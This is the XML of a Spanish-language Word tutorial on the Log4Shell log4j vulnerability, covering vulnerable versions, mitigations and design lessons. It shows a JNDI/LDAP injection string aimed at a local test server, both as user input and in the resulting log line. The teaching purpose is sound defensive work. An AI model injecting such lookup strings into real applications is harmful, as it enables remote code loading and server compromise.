        <w:t>Log4ShellEjemplo1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00671FD5" w:rsidRPr="002178D6" w:rsidRDefault="00671FD5" w:rsidP="00671FD5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onsolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002178D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve">Bienvenido a la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002178D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>aplicacion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002178D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>, por favor indique su usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00671FD5" w:rsidRPr="002178D6" w:rsidRDefault="00671FD5" w:rsidP="00671FD5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onsolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00671FD5" w:rsidRPr="002178D6" w:rsidRDefault="00671FD5" w:rsidP="00671FD5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onsolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002178D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>Usuario: Mi usuario es ${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002178D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>jndi:ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002178D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>://127.0.0.1:8888/ejemplo}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00671FD5" w:rsidRPr="002178D6" w:rsidRDefault="00671FD5" w:rsidP="00671FD5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onsolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002178D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>Su usuario es incorrecto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00671FD5" w:rsidRPr="002178D6" w:rsidRDefault="00671FD5" w:rsidP="00671FD5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onsolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002178D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>20:59:47.680 [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002178D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002178D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>] ERROR Log4ShellEjemplo1 - El usuario 'Mi usuario es ${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002178D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>jndi:ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002178D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>://127.0.0.1:8888/ejemplo}' es incorrecto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00671FD5" w:rsidRPr="002178D6" w:rsidRDefault="00671FD5" w:rsidP="00671FD5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onsolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002178D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve">Presione una tecla para </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002178D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>continuar .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002178D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> . .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00671FD5" w:rsidRDefault="00671FD5" w:rsidP="00671FD5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</w:p>
    <w:p w:rsidR="00671FD5" w:rsidRDefault="002178D6" w:rsidP="00671FD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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002178D6">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>SimpleJavaServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00671FD5" w:rsidRDefault="00671FD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596515" cy="1000760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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Vemos </w:t>
      </w:r>
      <w:r w:rsidRPr="002178D6">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">que efectivamente se conecta y hace una </w:t>
      </w:r>
      <w:r w:rsidRPr="002178D6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>petición</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (la cadena de texto no es </w:t>
      </w:r>
      <w:r>
        <w:t>sustitutiva</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> ni </w:t>
      </w:r>
      <w:r>
        <w:t>ejecutada</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> por </w:t>
      </w:r>
      <w:r>
        <w:t>qué</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el ejemplo no se devuelve una clase maliciosa)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002178D6" w:rsidRDefault="002178D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color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Los caracteres extraños que se muestran es parte de la petición </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>, como no hay una respuesta satisfactoria (por parte del programa de pruebas) se cierra la conexión.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRPr="00B8108A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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8108A">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Actualización a versiones no vulnerables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2D0D" w:rsidRPr="00DB2D0D" w:rsidRDefault="00DB2D0D" w:rsidP="00DB2D0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 w:rsidRPr="00DB2D0D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Las versiones vulnerable son desde la versión </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB2D0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB2D0D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a la </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB2D0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2.14.x</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB2D0D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, en la versión </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB2D0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2.15</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB2D0D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la funcionalidad esta deshabilitada por defecto y en la </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB2D0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">2.16 </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB2D0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>la funcionalidad se removió completamente.</w:t>
      </w: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</w:pPr>
      <w:r>
        <w:t>Hay que considerar que esta vulnerabilidad afecta a versiones de log4j para Java, con lo que tenemos que tener (en ejecución) algún sistema java, como una servidor o aplicación web con aplicaciones en Java, que use las versiones vulnerables.</w:t>
      </w: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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Otros </w:t>
      </w:r>
      <w:r w:rsidR="00DB2D0D">
        <w:t>frameworks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> para guardar logs, o en otras tecnologías (como NLog), no son vulnerables por esta circunstancia específica (aunque pueden tener otras vulnerabilidades específicas o no descubiertas que nada tienen que ver con ese tema).</w:t>
      </w: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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>¿Cómo se mitiga el efecto?</w:t>
      </w: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</w:pPr>
      <w:r>
        <w:t>La forma más segura de mitigar el efecto es actualizar nuestro software a versiones que no son vulnerables.</w:t>
      </w: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</w:pPr>
      <w:r>
        <w:t>Si esto no es posible, se puede deshabilitar la funcionalidad de Lookups, al configurar la máquina virtual de java con el siguiente parámetro.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRPr="00DB2D0D" w:rsidRDefault="00E12315" w:rsidP="00DB2D0D">
      <w:pPr>
        <w:pStyle w:val="normal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onsolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2D0D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="000369F5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>Dlog4j2.formatMsgNoLookups=true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2D0D" w:rsidRDefault="00DB2D0D" w:rsidP="00DB2D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FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DB2D0D" w:rsidRDefault="00DB2D0D" w:rsidP="00DB2D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OFF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2D0D" w:rsidRDefault="00DB2D0D" w:rsidP="00DB2D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B2D0D" w:rsidRDefault="00DB2D0D" w:rsidP="00DB2D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REM CLASSPATH con las versiones vulnerables.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2D0D" w:rsidRPr="00273EAD" w:rsidRDefault="00DB2D0D" w:rsidP="00DB2D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73EA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 w:rsidRPr="00273EA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CLASSPATH</w:t>
      </w:r>
      <w:r w:rsidRPr="00273EAD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=</w:t>
      </w:r>
      <w:r w:rsidRPr="00273EAD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>apache-log4j-2.14.1-bin\log4j-core-2.14.1.jar;apache-log4j-2.14.1-bin\log4j-api-2.14.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2D0D" w:rsidRPr="00273EAD" w:rsidRDefault="00DB2D0D" w:rsidP="00DB2D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B2D0D" w:rsidRDefault="00DB2D0D" w:rsidP="00DB2D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REM Ejecuto el ejemplo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2D0D" w:rsidRPr="00B8108A" w:rsidRDefault="00DB2D0D" w:rsidP="00DB2D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8108A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java</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B810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-Dlog4j2.formatMsgNoLookups=true Log4ShellEjemplo1.java</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2D0D" w:rsidRDefault="00DB2D0D" w:rsidP="00DB2D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PAUSE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2D0D" w:rsidRDefault="00DB2D0D" w:rsidP="00DB2D0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903B2" w:rsidRPr="000369F5" w:rsidRDefault="00E12315" w:rsidP="000369F5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:firstLine="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000369F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Otra forma de mitigar el efecto, si la actualización no es posible, es descomprimir el jar de log4j, borrar la clase </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000369F5" w:rsidRPr="000369F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JndiLookup.class</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000369F5" w:rsidRPr="000369F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000369F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>y volver a generar el jar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000369F5" w:rsidRDefault="000369F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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pP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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Ejemp</w:t>
      </w:r>
      <w:r w:rsidR="00B8108A">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>lo con versiones no vulnerables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000369F5" w:rsidRDefault="000369F5" w:rsidP="000369F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OFF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000369F5" w:rsidRDefault="000369F5" w:rsidP="000369F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369F5" w:rsidRDefault="000369F5" w:rsidP="000369F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REM CLASSPATH con las versiones vulnerables.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000369F5" w:rsidRPr="00B8108A" w:rsidRDefault="000369F5" w:rsidP="000369F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8108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B810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CLASSPATH</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8108A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lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00B810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apache-log4j-2.17.1-bin\log4j-core-2.17.1.jar;apache-log4j-2.17.1-bin\log4j-api-2.17.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000369F5" w:rsidRPr="00B8108A" w:rsidRDefault="000369F5" w:rsidP="000369F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0369F5" w:rsidRDefault="000369F5" w:rsidP="000369F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REM Ejecuto el ejemplo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000369F5" w:rsidRPr="00B8108A" w:rsidRDefault="000369F5" w:rsidP="000369F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8108A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java</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B8108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-Dlog4j2.formatMsgNoLookups=true Log4ShellEjemplo1.java</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000369F5" w:rsidRDefault="000369F5" w:rsidP="000369F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PAUSE</w:t>
      </w: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color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Conclusiones finales</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRDefault="00E1231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  <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Esta vulnerabilidad fue especialmente </w:t>
      </w:r>
      <w:r>
        <w:t>peligrosa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> por dos motivos</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRDefault="00E1231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</w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>La cantidad de  sitios creados en Java, y que usan log4j es inmensa</w:t>
      </w:r>
      <w:r>
        <w:t>, además que s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">on </w:t>
      </w:r>
      <w:r>
        <w:t>máquinas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> que forzosamente </w:t>
      </w:r>
      <w:r>
        <w:t>están</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> conectadas a internet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRDefault="00E1231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rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">El modelo de </w:t>
      </w:r>
      <w:r>
        <w:t>distribución</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> de componentes y aplicaciones en java (basado en jar y parecidos), a diferencia del modelo </w:t>
      </w:r>
      <w:r>
        <w:t>clásico</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:r>
        <w:t>librerías</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> comunes</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> es </w:t>
      </w:r>
      <w:r>
        <w:t>difícil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> de actualizar</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Frecuentemente </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">se distribuyen todas las </w:t>
      </w:r>
      <w:r>
        <w:t>dependencias</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (como log4j) como parte de la </w:t>
      </w:r>
      <w:r>
        <w:t>aplicación</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> final y esto </w:t>
      </w:r>
      <w:r>
        <w:t>implicaría</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> que puede estar muchas veces duplicado en una mism</w:t>
      </w:r>
      <w:r>
        <w:t>a máquina</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> y su </w:t>
      </w:r>
      <w:r>
        <w:t>sustitución</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> no es </w:t>
      </w:r>
      <w:r>
        <w:t>fácil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (si hay que hacerla de forma inmediata, como este caso).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRDefault="009903B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highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRDefault="00E12315" w:rsidP="00FA0DB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jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hay que considerar que uno de los problemas de esta vulnerabilidad es que ofrece una funcionalidad que estaba activada por defecto y que además permitía salir por defecto a obtener información de otras máquinas, sin ninguna restricción aparente. Puede que esta funcionalidad fuera interesante, y puede que hasta conveniente en algunos casos particulares, pero el hecho de no estar restringido desde un momento, es lo que lo hace demasiado ingenua. Recordemos que nuestra seguridad y nuestro diseño debe estar pensando como una “lista blanca”, en lugar de una “lista negra” (es decir </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nuestro</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> diseños de seguridad se deben basar en habilitar funcionalidad y permisos explícitamente y no en negarlos explícitamente)</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="009903B2" w:rsidSect="009903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6562"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="46628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28D1B40"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A98CE0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2B63F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E1CA7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E183393"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BC882B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F59175A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="27CACD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9903B2"/>
    <w:rsid w:val="000369F5"/>
    <w:rsid w:val="00051ED5"/>
    <w:rsid w:val="00087843"/>
    <w:rsid w:val="001624D1"/>
    <w:rsid w:val="002178D6"/>
    <w:rsid w:val="00273EAD"/>
    <w:rsid w:val="002D72C1"/>
    <w:rsid w:val="002E0DB3"/>
    <w:rsid w:val="00327BA9"/>
    <w:rsid w:val="00414645"/>
    <w:rsid w:val="00444E6F"/>
    <w:rsid w:val="00453620"/>
    <w:rsid w:val="004702F1"/>
    <w:rsid w:val="004B19BD"/>
    <w:rsid w:val="004F4302"/>
    <w:rsid w:val="00541BBB"/>
    <w:rsid w:val="00560DC2"/>
    <w:rsid w:val="00592C78"/>
    <w:rsid w:val="005D3FCF"/>
    <w:rsid w:val="005F6F87"/>
    <w:rsid w:val="00671FD5"/>
    <w:rsid w:val="006C6041"/>
    <w:rsid w:val="006E1989"/>
    <w:rsid w:val="006F38A0"/>
    <w:rsid w:val="007255B0"/>
    <w:rsid w:val="00750E2D"/>
    <w:rsid w:val="007A2261"/>
    <w:rsid w:val="009903B2"/>
    <w:rsid w:val="009A5989"/>
    <w:rsid w:val="009B518C"/>
    <w:rsid w:val="009C1BB1"/>
    <w:rsid w:val="00AA2DB3"/>
    <w:rsid w:val="00B03705"/>
    <w:rsid w:val="00B14487"/>
    <w:rsid w:val="00B36B48"/>
    <w:rsid w:val="00B8108A"/>
    <w:rsid w:val="00BD23A9"/>
    <w:rsid w:val="00D50E93"/>
    <w:rsid w:val="00DB2D0D"/>
    <w:rsid w:val="00DC100E"/>
    <w:rsid w:val="00E12315"/>
    <w:rsid w:val="00E665B3"/>
    <w:rsid w:val="00ED3934"/>
    <w:rsid w:val="00F34AE8"/>
    <w:rsid w:val="00FA0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9BD"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="normal0"/>
    <w:next w:val="normal0"/>
    <w:rsid w:val="009903B2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0"/>
    <w:next w:val="normal0"/>
    <w:rsid w:val="009903B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0"/>
    <w:next w:val="normal0"/>
    <w:rsid w:val="009903B2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9903B2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9903B2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9903B2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9903B2"/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableNormal">
    <w:name w:val="Table Normal"/>
    <w:rsid w:val="009903B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903B2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0"/>
    <w:next w:val="normal0"/>
